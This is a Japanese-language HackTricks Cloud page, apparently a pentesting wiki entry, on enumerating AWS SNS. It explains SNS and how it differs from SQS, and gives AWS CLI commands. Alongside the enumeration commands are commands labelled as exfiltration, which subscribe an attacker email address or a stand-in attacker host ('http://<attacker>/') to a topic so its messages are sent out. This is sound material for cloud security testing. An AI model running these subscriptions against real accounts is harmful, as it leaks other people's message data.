Japanese - Ht Cloud
HackTricks TrainingTwitterLinkedinSponsor

AWS - SNS Enum

HackTricksをサポートする

SNS

Amazon Simple Notification Service (Amazon SNS)は、完全に管理されたメッセージングサービスとして説明されています。これは、アプリケーション間 (A2A) と アプリケーションから人 (A2P) の通信タイプの両方をサポートしています。

A2A通信の主な機能には、公開/購読 (pub/sub) メカニズムが含まれます。これらのメカニズムは、トピックを導入し、高スループットのプッシュベースの多対多メッセージングを可能にします。この機能は、分散システム、マイクロサービス、およびイベント駆動のサーバーレスアーキテクチャを含むシナリオで非常に有利です。これらのトピックを活用することで、発行システムは広範囲の購読システムにメッセージを効率的に配信し、ファンアウトメッセージングパターンを促進できます。

SQSとの違い

SQSは、ポイントツーポイント通信を可能にするキュー型サービスであり、メッセージが単一の消費者によって処理されることを保証します。これは、少なくとも1回の配信を提供し、標準およびFIFOキューをサポートし、再試行や遅延処理のためのメッセージ保持を許可します。 一方、SNSは、公開/購読型サービスであり、メッセージを複数の購読者に同時にブロードキャストすることによって1対多通信を可能にします。これは、電子メール、SMS、Lambda関数、HTTP/HTTPSなどのさまざまなサブスクリプションエンドポイントをサポートし、ターゲットメッセージ配信のためのフィルタリングメカニズムを提供します。 両方のサービスは分散システム内のコンポーネント間のデカップリングを可能にしますが、SQSはキュー通信に焦点を当て、SNSはイベント駆動のファンアウト通信パターンを強調しています。

列挙

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint my-email@example.com

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>

トピックがFIFOタイプの場合SQSプロトコルを使用するサブスクライバーのみが使用できます(HTTPまたはHTTPSは使用できません)。

また、--topic-arnにリージョンが含まれていても、**--region**で正しいリージョンを指定することを確認してください。そうしないと、アクセス権がないことを示すエラーが表示されますが、問題はリージョンです。

認証されていないアクセス

権限昇格

エクスプロイト後

永続性

参考文献

HackTricksをサポートする
PreviousAWS - SES EnumNextAWS - SQS Enum

Last updated